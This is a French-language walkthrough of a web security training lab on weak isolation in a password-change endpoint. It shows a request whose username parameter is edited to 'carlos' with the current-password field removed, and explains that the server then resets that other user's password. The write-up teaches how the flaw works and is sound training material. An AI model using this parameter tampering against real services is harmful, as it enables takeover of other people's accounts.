Isolement faible sur un endpoint à double usage

Weak isolation on dual-use endpoint

Lab: Weak isolation on dual-use endpoint | Web Security AcademyWebSecAcademy

Description du laboratoire

Ce laboratoire repose sur une hypothèse erronée concernant le niveau de privilèges de l’utilisateur, basée uniquement sur les paramètres envoyés par le client. En exploitant une faille logique dans la fonctionnalité de gestion des comptes, il est possible de prendre le contrôle de comptes arbitraires, y compris le compte administrateur.

Objectif : Accéder au compte administrateur et supprimer l’utilisateur carlos.

Identifiants fournis :

Utilisateur : wiener
Mot de passe : peter

Observation du mécanisme de changement de mot de passe

Une fois connecté avec le compte wiener, une fonctionnalité permet de modifier le mot de passe. La requête envoyée au serveur est la suivante :

csrf=3wgY9AYHzbOWg73KitML2AQkY0fef2kK
&username=wiener
&current-password=peter
&new-password-1=jordan
&new-password-2=jordan

Le serveur se base sur le paramètre username fourni par le client pour déterminer le compte à modifier.

Exploitation de la faille logique

En modifiant la requête, il est possible de cibler un autre utilisateur.

De plus, le paramètre current-password n’est pas correctement vérifié.

Requête modifiée pour l’utilisateur carlos :

csrf=3wgY9AYHzbOWg73KitML2AQkY0fef2kK
&username=carlos
&new-password-1=jordan
&new-password-2=jordan

Le serveur accepte la requête et modifie le mot de passe du compte carlos, sans exiger l’ancien mot de passe.

Mis à jour il y a 2 mois

hashtagWeak isolation on dual-use endpoint

Weak isolation on dual-use endpoint